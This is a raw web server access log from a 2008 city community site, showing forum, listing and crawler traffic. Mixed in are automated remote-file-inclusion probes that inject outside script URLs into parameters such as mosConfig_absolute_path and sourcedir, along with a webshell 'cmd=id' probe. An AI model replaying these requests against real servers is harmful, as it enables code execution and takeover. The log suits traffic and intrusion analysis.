64.41.133.39 - - [30/Oct/2008:06:36:26 -0700] "GET /listings/listing/results.php?letter=c&category_id=759 HTTP/1.1" 200 28785 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:36:26 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:28 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=24095&sid=4461541f3c06e33a99e15ef12465d8f1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:36:28 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:36:31 -0700] "GET /jodera2/index.php?sid=51e2d88bf904979fdf5178687657a055 HTTP/1.0" 200 55143 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
84.16.230.111 - - [30/Oct/2008:06:36:31 -0700] "GET /jodera2/viewtopic.php?p=29926 HTTP/1.0" 200 82511 "http://www.sancarloscity.org/viewtopic.php?p=29926#29926" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:31 -0700] "GET /listings/listing/results.php?letter=f&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:44 -0700] "GET /listings/listing/results.php?letter=b&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:36:46 -0700] "GET /jodera2/viewtopic.php?p=27756 HTTP/1.1" 200 76342 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:36:46 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:36:48 -0700] "GET /jodera2/viewtopic.php?p=27274 HTTP/1.1" 200 41905 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:48 -0700] "GET /listings/listing/results.php?letter=u&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:36:49 -0700] "GET /jodera2/viewtopic.php?p=27215 HTTP/1.1" 200 41737 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:36:51 -0700] "GET /jodera2/viewtopic.php?p=27760&sid=ac659fb9cef1849b6510015054c53fa0 HTTP/1.1" 200 76405 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:36:52 -0700] "GET /listings/listing/results.php?letter=j&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
81.19.66.38 - - [30/Oct/2008:06:36:53 -0700] "GET /jodera2/viewtopic.php?p=27750&sid=267d62be1dfa5d49c609a0937ef244a5 HTTP/1.1" 200 75494 "-" "StackRambler/2.0 (MSIE incompatible)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:12 -0700] "GET /listings/listing/results.php?letter=o&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.79 - - [30/Oct/2008:06:37:22 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11446 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:22 -0700] "GET /listings/listing/results.php?letter=p&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:37:32 -0700] "GET /logs/access_080311.log HTTP/1.0" 200 1507328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:39 -0700] "GET /listings/listing/results.php?letter=v&category_id=759 HTTP/1.1" 200 25121 "http://www.sancarloscity.org/listings/listing/results.php?category_id=759" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:37:40 -0700] "GET /forum2/index.php?showtopic=214&mode=threaded&pid=1437 HTTP/1.1" 200 7410 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:46 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:49 -0700] "GET /listings/listing/results.php?category_id=691 HTTP/1.1" 200 53084 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:51 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:55 -0700] "GET /listings/listing/results.php?category_id=722 HTTP/1.1" 200 47383 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:37:59 -0700] "GET /listings/listing/results.php?category_id=733 HTTP/1.1" 200 47168 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:38:01 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:38:03 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:38:07 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:38:09 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?letter=v&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:38:12 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
82.99.30.49 - - [30/Oct/2008:06:38:32 -0700] "GET /jodera2/index.php?sid=6587dfd15dee13dd6d901b37d93e1dc1 HTTP/1.0" 200 61811 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
119.63.194.122 - - [30/Oct/2008:06:38:37 -0700] "GET /jodera2/viewtopic.php?p=11955 HTTP/1.1" 200 580150 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:38:38 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:38:38 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:38:38 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.1.215.166 - - [30/Oct/2008:06:38:45 -0700] "GET /jodera2/viewtopic.php?p=16070 HTTP/1.0" 200 32936 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
82.165.42.34 - - [30/Oct/2008:06:38:52 -0700] "POST /components/com_simpleboard/image_upload.php HTTP/1.1" 404 779 "-" "libwww-perl/5.803" "www.sancarloscity.org"
82.165.42.34 - - [30/Oct/2008:06:38:53 -0700] "GET /components/com_simpleboard/utyx.php?cmd=id HTTP/1.1" 404 771 "-" "-" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:38:56 -0700] "GET /forum2/index.php?showtopic=6&pid=1021&mode=threaded&start= HTTP/1.1" 200 7406 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:01 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:01 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:02 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:03 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:39:07 -0700] "GET /logs/access_080929.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 830 "-" "libwww-perl/5.803" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:11 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=92bc2d56a7be9d6216e7e05a6a9e8db2" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:06:39:12 -0700] "GET /jodera2/viewtopic.php?p=29928 HTTP/1.0" 200 31137 "http://www.sancarloscity.org/viewtopic.php?p=29928#29928" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
74.55.53.226 - - [30/Oct/2008:06:39:36 -0700] "GET /?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sancarloscity.org"
74.55.53.226 - - [30/Oct/2008:06:39:36 -0700] "GET /logs/access_080929.log/?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sancarloscity.org"
74.55.53.226 - - [30/Oct/2008:06:39:37 -0700] "GET /logs/?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 200 71305 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sancarloscity.org"
74.55.53.226 - - [30/Oct/2008:06:39:42 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:39:43 -0700] "GET /logs/access_081007.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 830 "-" "libwww-perl/5.803" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:39:49 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:39:50 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:39:51 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:39:52 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:40:00 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=57bc79e723f52fe7a14144af6f932ae1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:06:40:01 -0700] "GET /jodera2/viewtopic.php?p=29929#29929 HTTP/1.0" 200 31167 "http://www.sancarloscity.org/viewtopic.php?p=29929#29929" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:05 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61810 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
208.111.154.15 - - [30/Oct/2008:06:40:06 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=3&pos=2 HTTP/1.1" 200 10056 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
218.38.34.152 - - [30/Oct/2008:06:40:10 -0700] "GET /logs/access_081016.log/phphtml.php?htmlclass_path=? HTTP/1.1" 404 770 "-" "libwww-perl/5.79" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:40:11 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:40:11 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:40:11 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:21 -0700] "GET /jodera2/viewforum.php?f=1&sid=c056b6002fffcdd543ddad98282a7642 HTTP/1.0" 200 84812 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:40:21 -0700] "GET /forum2/index.php?act=Login&CODE=04&f=9&fromforum=8&i=1 HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:40:22 -0700] "GET /listings/listing/results.php?letter=l&category_id=757 HTTP/1.0" 200 25063 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:27 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:28 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
89.218.85.18 - - [30/Oct/2008:06:40:40 -0700] "GET /logs/access_081007.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dumkerng.com/eshop/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:50 -0700] "GET /jodera2/index.php?sid=c056b6002fffcdd543ddad98282a7642 HTTP/1.0" 200 55209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:50 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:40:50 -0700] "GET /forum2/index.php?showtopic=16&pid=1286&mode=threaded&start= HTTP/1.1" 200 7408 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:06:40:53 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11192 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:40:58 -0700] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 777 "-" "libwww-perl/5.803" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:40:58 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 766 "-" "libwww-perl/5.803" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:40:58 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 772 "-" "libwww-perl/5.803" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:41:04 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:41:07 -0700] "GET /forum2/index.php?s=67022773a0717c28974937e3c408c69c&showforum=8 HTTP/1.0" 200 7868 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
200.76.250.44 - - [30/Oct/2008:06:41:08 -0700] "GET /jodera2/index.php HTTP/1.1" 200 61934 "http://affroditaz.webng.com/index.html" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.5) Gecko/20050207 Firefox/1.0.1" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:09 -0700] "GET /?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 44270 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:09 -0700] "GET /logs/access_080929.log/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:09 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:10 -0700] "GET /logs/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 71305 "-" "libwww-perl/5.810" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:11 -0700] "GET /logs/access_080929.log/?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:11 -0700] "GET /?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:11 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:11 -0700] "GET /logs/?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 200 71305 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:15 -0700] "GET /?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 200 44270 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:15 -0700] "GET /logs/?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 200 71305 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:41:15 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.812" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:16 -0700] "GET /logs/access_080921.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 776 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:16 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 766 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:06:41:16 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://tesz.cscsecurity.org/tclkz/teszos?& HTTP/1.1" 404 771 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.sancarloscity.org"
208.111.154.16 - - [30/Oct/2008:06:41:19 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
66.40.52.30 - - [30/Oct/2008:06:41:20 -0700] "GET /logs/access_080917.log/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.800" "www.sancarloscity.org"
66.40.52.30 - - [30/Oct/2008:06:41:20 -0700] "GET /logs/access_080929.log/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.800" "www.sancarloscity.org"
66.40.52.30 - - [30/Oct/2008:06:41:20 -0700] "GET /?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 44270 "-" "libwww-perl/5.800" "www.sancarloscity.org"
66.40.52.30 - - [30/Oct/2008:06:41:20 -0700] "GET /logs/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 71305 "-" "libwww-perl/5.800" "www.sancarloscity.org"
66.40.52.30 - - [30/Oct/2008:06:41:22 -0700] "GET /?sourcedir=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 44270 "-" "libwww-perl/5.800" "www.sancarloscity.org"
